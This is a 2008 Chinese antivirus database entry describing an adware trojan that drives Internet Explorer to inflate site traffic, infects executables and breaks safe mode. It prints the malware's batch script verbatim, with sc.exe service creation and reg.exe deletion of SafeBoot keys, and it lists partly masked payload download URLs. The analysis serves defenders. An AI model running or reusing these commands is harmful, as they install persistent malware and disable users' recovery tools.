开发学院网络安全病毒数据库 Win32.HackTool.DownLoader.d.61440 阅读

Win32.HackTool.DownLoader.d.61440

　2008-08-11 20:26:41　来源：WEB开发网　　　

核心提示：病毒名称(中文):破坏型广告刷子61440病毒别名:威胁级别:★★☆☆☆病毒类型:广告软件病毒长度:61440影响系统:Win9xWinMeWinNTWin2000WinXPWin2003病毒行为:这是一个广告木马程序，它自带有一个网址库，Win32.HackTool.DownLoader.d.61440，会引导用户的

病毒名称(中文): 破坏型广告刷子61440
病毒别名:
威胁级别: ★★☆☆☆
病毒类型: 广告软件
病毒长度: 61440
影响系统: Win9xWinMeWinNTWin2000WinXPWin2003

病毒行为:

这是一个广告木马程序。它自带有一个网址库，会引导用户的IE浏览器自动登录这些网址，帮它们刷流量。同时它还能破坏系统的安全模式，阻止用户查杀它。

1.修改自身属性为只读隐藏系统。
2.将病毒母体拷贝到%windir%下和%windir%\system32下,，并命名随机名称A和随机名B。
3.获取系统分区的驱动器所在分区的前3个字符，连接DocumentsandSettings\AllUsers\「开始」菜单\程序\启动\，创建一随机名C的快捷方式，指向%windir%下的病毒母体，并创建一随机名C的批处理文件，里面写入：
REMOL0ZEIU0W6QXEXO0177NSU19VCPCQXAOGWS1LB0S1YSW2JBL
NJ7XT
sc.execreate5QINP2MGCVBinPath="C:\WINDOWS\5QINP2MGCV.exe-7ZK55JU0JJG6"type=owntype=interactstart=autoDisplayName=NPwps9U3
sc.exedescription5QINP2MGCV用以治理H8Q4J54ZGH8R69H
reg.exedeleteHKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}/F
reg.exedeleteHKLM\Software\Microsoft\Windows\CurrentVersion\Run/Fsc.execreateA02AWXB66DBinPath="C:\WINDOWS\system32\A02AWXB66D.exe-LXCU5QYM"type=owntype=interactstart=autoDisplayName=5A3VBS0Bsc.exedescriptionA02AWXB66DFFOLG8Z4YQRG6Idel%0
exit
运行该批处理，会创建2个服务来分别启动病毒在%windir%和%windir%\system32下的2个备份.并删除安全模式的注册表项，最后删除批处理自己。
4.释放自身资源到%windir%下取名为随机名称D连接上msi.exe，设置属性为隐藏系统只读并运行。
5.获取当前窗口的CLASS对比是不是"InternetExplorer_TridentDlgFrame"是发送WM_CLOSEWM_NCDESTROY来关闭销毁窗口，不是则找"#32770"获取标题，若发现"任务治理器""服务器正在""cript""://"":\""内存""rror""安""错"发送WM_CLOSEWM_NCDESTROY来关闭销毁窗口,"internetexplorer"例外。
6.资源释放的文件运行后，会遍历非C盘以外的所有execomscr文件找到后读取他的图标资源，保存并将自身8000字节大小的数据直接写入正常文件，破坏原来的文件。
7.资源释放的文件运行后，会在以下列表中随机下载一个到%windir%，并解密还原成可执行文件，并运行。
http://122.xxx.9.151/kills.txt? XDW3OCUX.exe.v
http://lmok1234xing.w239.xxxxx.cn/kills.txt?t3=XDW3OCUX.exe.v
http://baiduasp.web194.xxxxx.cn/kills.txt?t4=不能下
http://www.xxxxx.com/kills.txt?t5=IARL84Y.exe.v
8.XDW3OCUX.exe.v读取自身的141资源，并解密，
主要是解密出刷网站的地址列表的下载地址，
http://lmok1234xing.w239.xxxxx.cn/rouhostsip2008.txt
http://baiduasp.web194.xxxxx.cn/rouhostsip2008.txt
http://122.xxx.9.151/rouhostsip2008.txt
随机选择一个读取并拼接来刷流量。